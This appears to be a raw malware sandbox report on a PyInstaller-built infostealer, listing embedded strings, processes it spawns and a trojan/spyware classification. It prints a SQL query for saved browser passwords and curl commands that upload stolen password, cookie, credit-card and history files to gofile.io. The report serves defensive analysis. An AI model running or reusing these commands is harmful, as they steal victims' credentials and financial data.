Source: main.exe, 00000002.00000002.2021777975.000001E894070000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://setuptools.pypa.io/en/latest/userguide/declarative_config.html#opt-2
Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://spotify.com)
Source: main.exe, 00000002.00000003.2013074087.000001E89396A000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1793009900.000001E893AAF000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1977044312.000001E8935F0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2013387739.000001E893A03000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1975698701.000001E8935C5000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1977713618.000001E893961000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1796280845.000001E893C26000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1981338350.000001E893A01000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1993956147.000001E893A03000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1974979765.000001E8939E5000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1976909466.000001E8935C6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1984238904.000001E893A04000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2020045883.000001E893A03000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2012429799.000001E893A03000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1996321903.000001E893968000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2001043628.000001E8935FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/questions/267399/how-do-you-match-only-valid-roman-numerals-with-a-regular
Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://stake.com)
Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://steam.com)
Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://store1.gofile.io/contents/uploadfile
Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://telegram.com)
Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://tiktok.com)
Source: main.exe, 00000002.00000003.2001802176.000001E894710000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1973551416.000001E894703000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1976302124.000001E894703000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2005186988.000001E894727000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2023563231.000001E89472A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc2388#section-4.4
Source: main.exe, 00000002.00000003.1997906839.000001E894A82000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972023696.000001E8947B2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2004907277.000001E8947DB000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2006977893.000001E8947E4000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972587068.000001E894A80000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2024203636.000001E8947E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc3610
Source: main.exe, 00000002.00000003.1999083048.000001E894B30000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1996121577.000001E894BD2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1995247587.000001E894B2C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2025577227.000001E894BD5000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1998028650.000001E894BD5000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1986551166.000001E894BCF000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1975513124.000001E894BC1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc5297
Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://twitch.com)
Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://twitter.com)
Source: main.exe, 00000002.00000003.1977713618.000001E893961000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1976200965.000001E894862000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1998719177.000001E893984000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972023696.000001E894862000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2001089205.000001E893984000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1983459559.000001E894863000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2013542756.000001E894863000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1979273332.000001E894862000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2024442172.000001E894863000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1987244040.000001E893982000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1985312347.000001E89397C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1993083249.000001E893984000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://twitter.com/
Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://uber.com)
Source: main.exe, 00000002.00000002.2021248839.000001E893CF0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://upload.pypi.org/legacy/
Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy
Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings
Source: main.exe, 00000002.00000003.1981902344.000001E894A89000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1992755022.000001E894A89000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1973472828.000001E894A88000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972587068.000001E894A80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://web.archive.org/web/20120328125543/http://www.jpegcameras.com/libjpeg/libjpeg-3.html
Source: main.exe, 00000002.00000003.1975924116.000001E893326000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2008458443.000001E89334A000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2012911590.000001E89334C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1985986835.000001E89334A000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1977459782.000001E893349000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wiki.debian.org/XDGBaseDirectorySpecification#state
Source: main.exe, 00000002.00000003.1976534572.000001E894A92000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2012511330.000001E894A99000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2025190061.000001E894A9C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1973472828.000001E894A88000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972587068.000001E894A80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ietf.org/rfc/rfc2898.txt
Source: main.exe, 00000002.00000003.1995482563.000001E894627000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1971266295.000001E894600000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972288327.000001E89460F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1980605217.000001E894618000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.python.org
Source: main.exe, 00000002.00000003.1973010642.000001E893A4D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1978592500.000001E893A5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.python.org/
Source: main.exe, 00000002.00000003.1778406388.000001E893355000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1778179908.000001E893355000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.python.org/download/releases/2.3/mro/.
Source: main.exe, 00000002.00000003.1972023696.000001E89477F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2001384242.000001E894787000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.rfc-editor.org/rfc/rfc8259#section-8.1
Source: main.exe, 00000002.00000002.2024904909.000001E894A03000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1984378367.000001E8949FB000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1971942361.000001E8949D7000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1984162933.000001E8949D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wwww.certigna.fr/autorites/
Source: main.exe, 00000002.00000003.1976823794.000001E8947EA000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972023696.000001E8947B2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1989712594.000001E8947EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wwww.certigna.fr/autorites/0m
Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://xbox.com)
Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://yahoo.com)
Source: main.exe, 00000002.00000003.1995482563.000001E894627000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1974112566.000001E8945D6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1971266295.000001E894600000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972288327.000001E89460F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1974081056.000001E8945C4000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2011453288.000001E8945E2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1980605217.000001E894618000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972765253.000001E89459D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://yahoo.com/
Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com)

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736

Detected potential crypto function

Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7333B1B38	0_2_00007FF7333B1B38
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7333B7BD4	0_2_00007FF7333B7BD4
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF733398020	0_2_00007FF733398020
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7333B6E70	0_2_00007FF7333B6E70
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7333A2420	0_2_00007FF7333A2420
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7333A4450	0_2_00007FF7333A4450
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7333A6CF0	0_2_00007FF7333A6CF0
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7333A3B88	0_2_00007FF7333A3B88
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7333AEB24	0_2_00007FF7333AEB24
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7333B531C	0_2_00007FF7333B531C
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7333A132C	0_2_00007FF7333A132C
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF73339A26D	0_2_00007FF73339A26D
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF733399A34	0_2_00007FF733399A34
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7333B2AE4	0_2_00007FF7333B2AE4
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7333A1128	0_2_00007FF7333A1128
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7333BA998	0_2_00007FF7333BA998
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7333A9020	0_2_00007FF7333A9020
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7333B70EC	0_2_00007FF7333B70EC
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF73339989B	0_2_00007FF73339989B
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7333A3F8C	0_2_00007FF7333A3F8C
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7333A0F1C	0_2_00007FF7333A0F1C
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7333A173C	0_2_00007FF7333A173C
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7333A3750	0_2_00007FF7333A3750
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7333A27B8	0_2_00007FF7333A27B8
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7333AEFB8	0_2_00007FF7333AEFB8
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7333B4E80	0_2_00007FF7333B4E80
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7333B1B38	0_2_00007FF7333B1B38
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7333B7688	0_2_00007FF7333B7688
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7333AAE20	0_2_00007FF7333AAE20
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7333AF638	0_2_00007FF7333AF638
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7333A96D0	0_2_00007FF7333A96D0
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7333A0D18	0_2_00007FF7333A0D18
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF7333A1538	0_2_00007FF7333A1538
Source: C:\Users\user\Desktop\main.exe	Code function: 0_2_00007FF733398DC0	0_2_00007FF733398DC0

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\main.exe

Code function: String function: 00007FF733391E50 appears 53 times

PE file contains executable resources (Code or Archives)

Source: unicodedata.pyd.0.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: _overlapped.pyd.0.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS

PE file does not import any functions

Source: python3.dll.0.dr

Static PE information: No import functions for PE file found

Sample file is different than original file name gathered from version info

Source: main.exe, 00000000.00000003.1754671215.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_hashlib.pyd. vs main.exe
Source: main.exe, 00000000.00000003.1753820338.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_bz2.pyd. vs main.exe
Source: main.exe, 00000000.00000003.1753335252.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_asyncio.pyd. vs main.exe
Source: main.exe, 00000000.00000003.1752729643.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamewin32ui.pyd0 vs main.exe
Source: main.exe, 00000000.00000003.1754774783.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_lzma.pyd. vs main.exe
Source: main.exe, 00000000.00000003.1754921734.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_multiprocessing.pyd. vs main.exe
Source: main.exe, 00000000.00000003.1754483691.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_elementtree.pyd. vs main.exe
Source: main.exe, 00000000.00000003.1754995802.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_overlapped.pyd. vs main.exe
Source: main.exe, 00000000.00000003.1754333997.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_decimal.pyd. vs main.exe
Source: main.exe, 00000000.00000003.1753127586.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamevcruntime140.dllT vs main.exe
Source: main.exe, 00000000.00000003.1754059092.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_ctypes.pyd. vs main.exe
Source: main.exe, 00000000.00000003.1753253644.0000024BCD652000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamevcruntime140_1.dllT vs main.exe
Source: main.exe, 00000002.00000002.2015409411.000001E891430000.00000002.00000001.01000000.00000006.sdmp	Binary or memory string: OriginalFilenamepython3.dll. vs main.exe

Source: classification engine

Classification label: mal92.troj.spyw.winEXE@40/137@2/2

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7596:120:WilError_03

Source: C:\Users\user\Desktop\main.exe

File created: C:\Users\user\AppData\Local\Temp\_MEI75802

Jump to behavior

Source: main.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\tasklist.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process

Source: C:\Users\user\Desktop\main.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp

Binary or memory string: SELECT action_url, username_value, password_value FROM logins;

Source: main.exe	ReversingLabs: Detection: 15%
Source: main.exe	Virustotal: Detection: 23%

Source: C:\Users\user\Desktop\main.exe

File read: C:\Users\user\Desktop\main.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\main.exe "C:\Users\user\Desktop\main.exe"
Source: C:\Users\user\Desktop\main.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\main.exe	Process created: C:\Users\user\Desktop\main.exe "C:\Users\user\Desktop\main.exe"
Source: C:\Users\user\Desktop\main.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
Source: C:\Users\user\Desktop\main.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
Source: C:\Users\user\Desktop\main.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prpasswords.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prpasswords.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile
Source: C:\Users\user\Desktop\main.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path softwarelicensingservice get OA3xOriginalProductKey"
Source: C:\Users\user\Desktop\main.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prcookies.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prcookies.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path softwarelicensingservice get OA3xOriginalProductKey
Source: C:\Users\user\Desktop\main.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prcreditcards.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prcreditcards.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile
Source: C:\Users\user\Desktop\main.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prautofills.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prautofills.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile
Source: C:\Users\user\Desktop\main.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prhistories.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prhistories.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile
Source: C:\Users\user\Desktop\main.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prbookmarks.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prbookmarks.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile
Source: C:\Users\user\Desktop\main.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
Source: C:\Users\user\Desktop\main.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Users\user\Desktop\main.exe	Process created: C:\Users\user\Desktop\main.exe "C:\Users\user\Desktop\main.exe"	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prpasswords.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path softwarelicensingservice get OA3xOriginalProductKey"	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prcookies.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prcreditcards.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prautofills.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prhistories.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Tempprysmax-745773\prbookmarks.txt" https://[{'name': 'store-eu-par-3', 'zone': 'eu'}, {'name': 'store6', 'zone': 'eu'}, {'name': 'store5', 'zone': 'eu'}, {'name': 'store4', 'zone': 'eu'}, {'name': 'store1', 'zone': 'eu'}].gofile.io/contents/uploadfile"	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"	Jump to behavior
Source: C:\Users\user\Desktop\main.exe	Process created: C:\Windows\System32\tasklist.exe tasklist	Jump to behavior
